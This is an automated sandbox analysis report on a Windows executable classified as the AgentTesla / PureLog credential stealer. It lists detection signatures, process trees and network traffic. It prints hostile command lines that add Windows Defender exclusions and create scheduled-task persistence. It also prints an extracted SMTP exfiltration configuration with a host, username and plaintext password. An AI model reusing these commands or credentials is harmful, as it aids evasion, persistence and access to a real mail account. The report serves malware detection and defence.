Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nOrden_de_compra.exe

Overview

General Information

Sample name:nOrden_de_compra.exe
Analysis ID:1385592
MD5:593bb72286c1c2ce5c2456c7d9585a80
SHA1:cb9bf63f9005d5b4f1bcbcf3efead399a1c960a7
SHA256:84f0a1001a606072b86d8eca2c4d9ccefc71c38ff71d0aaa2f4ae003f802917b
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • nOrden_de_compra.exe (PID: 5724 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6464 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nOrden_de_compra.exe (PID: 2216 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • nOrden_de_compra.exe (PID: 1460 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
  • nNdsLvHyWi.exe (PID: 6640 cmdline: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • schtasks.exe (PID: 3576 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nNdsLvHyWi.exe (PID: 1176 cmdline: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.triorentacar.ro", "Username": "rezervari@triorentacar.ro", "Password": "trio1289"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            0.2.nOrden_de_compra.exe.71a0000.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.nOrden_de_compra.exe.71a0000.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.nOrden_de_compra.exe.2cde9dc.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.nOrden_de_compra.exe.7160000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 31 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentImage: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentProcessId: 6640, ParentProcessName: nNdsLvHyWi.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, ProcessId: 3576, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 89.32.46.159, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\nOrden_de_compra.exe, Initiated: true, ProcessId: 1460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49703
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, CommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, NewProcessName: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, OriginalFileName: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ProcessId: 6640, ProcessName: nNdsLvHyWi.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, ProcessId: 6464, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, ProcessId: 6464, ProcessName: schtasks.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.triorentacar.ro", "Username": "rezervari@triorentacar.ro", "Password": "trio1289"}
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeVirustotal: Detection: 43%Perma Link
                      Source: nOrden_de_compra.exeReversingLabs: Detection: 63%
                      Source: nOrden_de_compra.exeVirustotal: Detection: 43%Perma Link
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJoe Sandbox ML: detected
                      Source: nOrden_de_compra.exeJoe Sandbox ML: detected
                      Source: nOrden_de_compra.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49706 version: TLS 1.2
                      Source: nOrden_de_compra.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: rYwr.pdbSHA256$x] source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr
                      Source: Binary string: rYwr.pdb source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr

                      Networking

                      barindex
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.6:49703 -> 89.32.46.159:587
                      Source: Joe Sandbox ViewIP Address: 173.231.16.76 173.231.16.76
                      Source: Joe Sandbox ViewIP Address: 173.231.16.76 173.231.16.76
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.6:49703 -> 89.32.46.159:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.ipify.org
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.0000000001140000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4543063904.00000000068E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.triorentacar.ro
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.0000000001140000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2146832318.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://triorentacar.ro
                      Source: nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.8
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49706 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, K6jmfEUYzg.cs.Net Code: vjB
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
